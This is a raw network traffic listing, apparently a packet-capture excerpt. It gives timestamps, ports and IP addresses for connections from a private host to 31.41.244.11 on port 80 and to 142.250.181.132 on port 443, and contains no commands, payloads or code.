Dec 14, 2024 12:56:43.086930037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.086930037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.087985039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.088000059 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.088102102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.088999033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.089015007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.089057922 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.089116096 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.089917898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.089997053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.090235949 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.090364933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.090989113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.091088057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.091123104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.091213942 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.092082977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.092170000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.092408895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.093128920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.093146086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.093209982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.093209982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.094191074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.094218969 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.094556093 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.095238924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.095254898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.095309973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.096218109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.096340895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.096373081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.096482038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.097328901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.097362995 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.097407103 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.098381996 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.098397970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.098423958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.098423958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.098483086 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.099369049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.099607944 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.099958897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.100455046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.100470066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.100656986 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.101466894 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.101483107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.101530075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.101530075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.102474928 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.102529049 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.102854967 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.103188992 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.103669882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.103686094 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.103717089 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.103753090 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.104625940 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.104643106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.105010033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.105561972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.105652094 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.105722904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.106599092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.106662989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.106683016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.106771946 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.107708931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.107724905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.107769966 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.108691931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.108745098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.108949900 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.109004974 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.109826088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.109842062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.109890938 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.110749960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.110846043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.110958099 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.111814022 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.111915112 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.111943960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.112870932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.112989902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.113018990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.113850117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.113918066 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.113950014 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.114521980 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.114895105 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.115005016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.115051031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.115102053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.116161108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.116175890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.116259098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.116259098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.117196083 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.117213011 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.117258072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.117258072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.118143082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.118240118 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.118282080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.118498087 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.119060040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.119326115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.119363070 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.119405985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.120141029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.120534897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.120552063 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.120608091 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.121196032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.121225119 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.121264935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.121264935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.122312069 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.122328043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.122371912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.122371912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.123328924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.123344898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.123389959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.123389959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.124362946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.124378920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.124429941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.124429941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.125360966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.125689983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.125716925 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.125766039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.126439095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.126456022 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.126496077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.126497030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.127396107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.127715111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.127780914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.127836943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.128452063 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.128501892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.128667116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.128793955 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.129511118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.129585981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.129623890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.129669905 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.130584002 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.130645037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.130673885 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.130685091 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.131555080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.131630898 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.131695032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.131751060 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.132591009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.132688999 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.166091919 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.166224957 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.166310072 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.167998075 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.168030024 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.178173065 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.178327084 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.178467035 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.178533077 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.178546906 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.178618908 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.180030107 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186141014 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186347008 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.186614037 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.186633110 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186670065 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186718941 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186760902 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.186778069 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.186908960 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.186916113 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.195184946 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.195229053 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.195240021 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.214890957 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.215333939 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.215342999 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.224683046 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.224841118 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:43.224853992 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:43.270768881 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.270862103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.270895004 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.270924091 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.270932913 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.271122932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.271173954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.271229029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.271248102 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.271333933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.272335052 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.272411108 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.272425890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.272638083 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.273508072 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.273570061 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.273583889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.273684025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.274364948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.274403095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.274420023 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.274472952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.275285006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.275351048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.275408030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.275480032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.276451111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.276485920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.276515007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.276535034 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.277396917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.277508020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.277524948 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.277560949 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.278532028 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.278609991 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.278691053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.278745890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.279457092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.279510021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.279551983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.279551983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.280657053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.280697107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.280781031 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.280781031 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.281677961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.281713009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.281723022 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.281769037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.282635927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.282757044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.282819033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.282872915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.283618927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.283678055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.283822060 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.283902884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.284778118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.284919024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.284986973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.285468102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.285826921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.285860062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.285902977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.285902977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.286787033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.286838055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.286926985 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.286992073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.287856102 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.287951946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.287956953 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.288003922 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.288872957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.288969040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.288991928 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.289125919 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.289946079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.289980888 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.290023088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.290023088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.290961027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.290997028 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.291021109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.291049004 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.292082071 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.292114973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.292148113 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.292167902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.293113947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.293148041 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.293174028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.293195009 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.294099092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.294131994 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.294152975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.294333935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.295128107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.295176983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.295274973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.295341015 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.296153069 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.296586990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.296664953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.296763897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.297144890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.297200918 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.297269106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.297328949 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.298274994 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.298372030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.298379898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.298435926 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.299220085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.299273014 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.299348116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.299408913 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.300404072 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.300437927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.300477028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.300477028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.301393986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.301428080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.301469088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.301469088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.302464008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.302499056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.302540064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.302540064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.303459883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.303546906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.303611040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.303678036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.304893017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.304932117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.304987907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.305596113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.305680990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.305682898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.305735111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.306545973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.306613922 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.306668043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.306730032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.307615995 CET	80	49860	31.41.244.11	192.168.2.4
